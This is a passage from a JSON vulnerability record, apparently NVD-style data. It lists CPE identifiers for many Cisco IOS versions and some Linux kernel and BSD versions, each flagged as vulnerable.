                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xd2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.1.132:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:dragonflybsd:dragonflybsd:1.10.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(17\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(15\\)ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2sa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(7\\)ca:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(18\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)w5\\(18f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)w5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(13\\)w5\\(19c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(11\\)st4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)w5\\(21\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)sl9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(7\\)db1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3db:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(26e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(05\\)wc8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(13\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\)st3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(4.2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(4.3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(8\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8.2\\)sa6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(1\\)ed:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1ca:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(26a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(19\\)gs0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8\\)sa1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(16\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\)xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)st1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)w5\\(22b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s5a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(25.4\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)w5\\(28\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1.3\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ea1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\)w5-30b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\)sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)db:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5.4\\)wc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5.2\\)xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)fc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12c\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)s2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)sp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(22\\)s5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(25\\)w5\\(27c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)w5\\(28a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)xe1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0db:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)ec1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14.5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(19\\)e6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12c\\)e7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(26\\)eb1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\)eb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)e12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xm4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ev:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)dx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)jk4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12.05\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)ya2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yb5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yd2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xv3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)t15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)da1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1eb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(10g\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16\\)b1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6.5\\)ec3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xy6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xs2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xu1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1cx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xd4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12.02\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(19\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)se:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ewa1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(29a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)b2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sec2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sw4a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(26\\)sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)eu2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sbc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(13b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(13a\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)ys1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(12b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)xl3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(10e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)yc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(19\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mb3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)seb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(22\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sw3a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
